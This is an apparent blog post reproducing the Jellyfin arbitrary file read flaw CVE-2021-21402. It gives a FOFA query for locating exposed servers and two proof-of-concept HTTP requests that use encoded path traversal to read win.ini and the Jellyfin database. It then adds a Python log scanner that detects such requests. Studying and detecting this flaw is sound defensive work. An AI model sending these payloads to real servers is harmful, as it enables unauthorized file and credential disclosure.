剑胆琴心


Study with focus, and become the person you want to be

Reproducing the Jellyfin Arbitrary File Read Vulnerability (CVE-2021-21402)

Affected versions: Jellyfin < 10.7.1

Reproduction

FOFA syntax

```
title="Jellyfin"
```

POC

```http
# poc_1
GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
Host: xxx.xxx.xxx.xxx
Content-Type: application/octet-stream

# poc_2
GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
Host: x.x.x.x:5577
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
```
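For the defensive side, the following is an added example (not part of the original post) that scans web access logs for the request shape the two PoC requests share: an `/Audio/<id>/hls/<segment>/stream.mp3` path whose segment decodes to a backslash or a `..` component. The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Path shape taken from the two PoC requests: /Audio/<id>/hls/<segment>/stream.mp3
HLS_AUDIO = re.compile(r"^/Audio/[^/]+/hls/(?P<segment>.+)/stream\.mp3/?$", re.IGNORECASE)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')  # combined-log request field


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%255C) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal_attempt(raw_path):
    """True when the HLS segment part carries a backslash or a '..' component."""
    path = decode_fully(raw_path.split("?", 1)[0])
    match = HLS_AUDIO.match(path)
    if not match:
        return False
    segment = match.group("segment")
    return "\\" in segment or ".." in re.split(r"[\\/]", segment)


def scan(log_lines):
    """Return (line number, decoded path) for every suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST.search(line)
        if request and is_traversal_attempt(request.group("path")):
            hits.append((number, decode_fully(request.group("path"))))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2021:10:00:01 +0000] "GET /Audio/1/hls/..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 200 92',
    '192.0.2.11 - - [01/Apr/2021:10:00:02 +0000] "GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1" 200 4096',
    '198.51.100.7 - - [01/Apr/2021:10:00:03 +0000] "GET /Audio/3f2a/hls/segment0/stream.mp3 HTTP/1.1" 200 51234',
    '198.51.100.8 - - [01/Apr/2021:10:00:04 +0000] "GET /Audio/1/hls/..%255Cdata%255Cx/stream.mp3/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: {path}")
```

A hit with a 200 status on an instance older than 10.7.1 is worth treating as a possible file disclosure and reviewing alongside the response size.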